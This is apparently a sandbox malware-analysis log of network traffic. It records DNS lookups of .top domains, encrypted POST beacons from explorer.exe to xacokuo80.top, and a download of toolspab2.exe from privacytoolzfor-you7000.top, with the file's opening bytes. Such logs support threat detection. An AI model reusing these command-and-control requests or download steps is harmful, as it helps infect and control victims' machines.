            Nov 25, 2021 18:24:52.066772938 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.066793919 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:52.066822052 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:52.094463110 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094510078 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094542027 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094573021 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094604969 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094645977 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.094665051 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:52.094718933 CET | 49716 | 80 | 192.168.2.4 | 212.192.241.249
            Nov 25, 2021 18:24:52.124514103 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.124707937 CET | 80 | 49716 | 212.192.241.249 | 192.168.2.4
            Nov 25, 2021 18:24:52.124764919 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124809980 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124835968 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.124902010 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.124907017 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.152753115 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.152790070 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.152947903 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.181615114 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.181679010 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.181695938 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.181735039 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.209623098 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.209667921 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.209739923 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.237504005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.237555981 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.237662077 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.265712976 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.265798092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.293829918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293886900 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293930054 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293956995 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.294002056 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322004080 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322062016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322103977 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322110891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322151899 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322166920 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.350096941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350152016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350193977 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350270033 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.378245115 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.378302097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.378351927 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.406286955 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.406344891 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.406413078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.437220097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.437283993 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.437393904 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.469877005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.469945908 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.498076916 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.498135090 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.498219967 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.498284101 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.526021957 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.526160955 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.526179075 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.526252031 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.554965019 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.555093050 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.583504915 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.583669901 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.611515045 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.611726046 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.640008926 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.640054941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.640203953 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.668425083 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.711072922 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.741050005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.741185904 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.769049883 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.769177914 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.039555073 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.039669991 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.067493916 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.067522049 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.067615986 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.095354080 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.095503092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.123745918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.123837948 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.154874086 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.154999971 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.182739019 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.182854891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.210673094 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.210738897 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.238432884 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.238468885 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.238516092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.266179085 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.266206980 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.266288042 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.294073105 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294102907 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294116020 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294132948 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294264078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.321993113 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322019100 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322031975 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322045088 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322098970 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.322129011 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.349947929 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.350053072 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.353358984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.353379965 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.353424072 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.353454113 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.377852917 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.377938032 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.381149054 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.381170034 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.381203890 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.381239891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.408904076 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.408926010 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.408996105 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.438626051 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438673973 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438700914 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438730001 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.466515064 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.466589928 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.466694117 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.494544029 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.494600058 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.494658947 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.522727966 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.522774935 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.522923946 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.551661968 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.551795006 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.582899094 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.582928896 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.583003998 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.583045959 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.613123894 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.613182068 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.613281012 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.613326073 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.883208990 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.929472923 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.957350016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.957494974 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.985435963 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.986890078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.014875889 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.015114069 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.042807102 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.043723106 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.071611881 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.072237015 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.100414991 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.103739023 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.131922007 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.132128954 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.160303116 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.160347939 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.160897970 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.263168097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.263813972 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.307168961 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.307327032 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.335108995 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.335138083 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.335685015 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.363605976 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.363962889 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.391880989 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.460676908 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.467678070 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.467854977 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.488745928 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.488938093 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.496494055 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.496664047 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.517132998 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.517280102 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.525036097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.526588917 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.547986984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.554903984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.555735111 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.583772898 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583856106 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583920956 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583928108 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.612360001 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.612387896 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.612485886 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640624046 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640650988 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640670061 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640686035 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640716076 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640743017 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640748024 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640870094 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.669049025 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:56.275383949 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333424091 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:57.333610058 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333904028 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333946943 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.530147076 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:59.157474995 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.445750952 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.829710007 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:25:02.829880953 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.831438065 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:05.977720976 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:12.196557045 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:24.619411945 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:24.838907003 CET8049717212.192.241.249192.168.2.4

            UDP Packets

            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Nov 25, 2021 18:24:49.960967064 CET | 61516 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:24:49.985004902 CET | 53 | 61516 | 8.8.8.8 | 192.168.2.4
            Nov 25, 2021 18:24:49.996679068 CET | 49182 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:24:50.034112930 CET | 53 | 49182 | 8.8.8.8 | 192.168.2.4
            Nov 25, 2021 18:24:50.222058058 CET | 59920 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:24:50.259314060 CET | 53 | 59920 | 8.8.8.8 | 192.168.2.4
            Nov 25, 2021 18:24:50.441802979 CET | 57458 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:24:50.765567064 CET | 53 | 57458 | 8.8.8.8 | 192.168.2.4
            Nov 25, 2021 18:24:56.235585928 CET | 50579 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:24:56.273138046 CET | 53 | 50579 | 8.8.8.8 | 192.168.2.4
            Nov 25, 2021 18:25:02.845268011 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:25:03.853210926 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:25:04.899115086 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:25:06.899563074 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8
            Nov 25, 2021 18:25:10.962596893 CET | 51703 | 53 | 192.168.2.4 | 8.8.8.8

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Nov 25, 2021 18:24:49.960967064 CET | 192.168.2.4 | 8.8.8.8 | 0x54b3 | Standard query (0) | nalirou70.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:49.996679068 CET | 192.168.2.4 | 8.8.8.8 | 0xba | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:50.222058058 CET | 192.168.2.4 | 8.8.8.8 | 0xbfc3 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:50.441802979 CET | 192.168.2.4 | 8.8.8.8 | 0x11d3 | Standard query (0) | privacytoolzfor-you7000.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:56.235585928 CET | 192.168.2.4 | 8.8.8.8 | 0x9022 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:25:02.845268011 CET | 192.168.2.4 | 8.8.8.8 | 0x5bd9 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:25:03.853210926 CET | 192.168.2.4 | 8.8.8.8 | 0x5bd9 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:25:04.899115086 CET | 192.168.2.4 | 8.8.8.8 | 0x5bd9 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:25:06.899563074 CET | 192.168.2.4 | 8.8.8.8 | 0x5bd9 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:25:10.962596893 CET | 192.168.2.4 | 8.8.8.8 | 0x5bd9 | Standard query (0) | xacokuo80.top | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Nov 25, 2021 18:24:49.985004902 CET | 8.8.8.8 | 192.168.2.4 | 0x54b3 | Name error (3) | nalirou70.top | none | none | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:50.034112930 CET | 8.8.8.8 | 192.168.2.4 | 0xba | No error (0) | xacokuo80.top |  | 212.192.241.249 | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:50.259314060 CET | 8.8.8.8 | 192.168.2.4 | 0xbfc3 | No error (0) | xacokuo80.top |  | 212.192.241.249 | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:50.765567064 CET | 8.8.8.8 | 192.168.2.4 | 0x11d3 | No error (0) | privacytoolzfor-you7000.top |  | 212.192.241.249 | A (IP address) | IN (0x0001)
            Nov 25, 2021 18:24:56.273138046 CET | 8.8.8.8 | 192.168.2.4 | 0x9022 | No error (0) | xacokuo80.top |  | 212.192.241.249 | A (IP address) | IN (0x0001)

            HTTP Request Dependency Graph

            • edwxjxx.net
              • xacokuo80.top
            • kwcurllpj.com
            • privacytoolzfor-you7000.top
            • tpjfndspxp.com

            HTTP Packets

            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.4 | 49714 | 212.192.241.249 | 80 | C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 25, 2021 18:24:50.066019058 CET | 1 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://edwxjxx.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 151
            Host: xacokuo80.top
            Nov 25, 2021 18:24:50.066059113 CET | 1 | OUT | Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 31 a6 b8 3b
            Data Ascii: lK3{B75Zwmwu$f]d1;K4t!{{lN"rduKE~1tY$<_Q{bC!_)l~
            Nov 25, 2021 18:24:50.207442999 CET | 2 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 19{i+,GO0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            1 | 192.168.2.4 | 49715 | 212.192.241.249 | 80 | C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 25, 2021 18:24:50.288214922 CET | 2 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://kwcurllpj.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 356
            Host: xacokuo80.top
            Nov 25, 2021 18:24:50.288240910 CET | 3 | OUT | Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 4b 8b b0 71
            Data Ascii: lK3{B75Zwmwu$f]dKq:1b/(yNId@qX$*]<!2fo4m$Q7&/{DR;wav-t;E/nom*Ouzm>g)^ix yf["?9*$FX,
            Nov 25, 2021 18:24:50.428165913 CET | 3 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 46I:82OOj/YJUg%EQAc}yc0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            2 | 192.168.2.4 | 49716 | 212.192.241.249 | 80 | C:\Windows\explorer.exe
            Timestamp | kBytes transferred | Direction | Data
            Nov 25, 2021 18:24:50.799880028 CET | 4 | OUT | GET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzfor-you7000.top
            Nov 25, 2021 18:24:50.919018984 CET | 5 | IN | HTTP/1.1 200 OK
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: application/x-msdos-program
            Content-Length: 302592
            Connection: close
            Last-Modified: Thu, 25 Nov 2021 17:24:01 GMT
            ETag: "49e00-5d1a03d96f132"
            Accept-Ranges: bytes
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 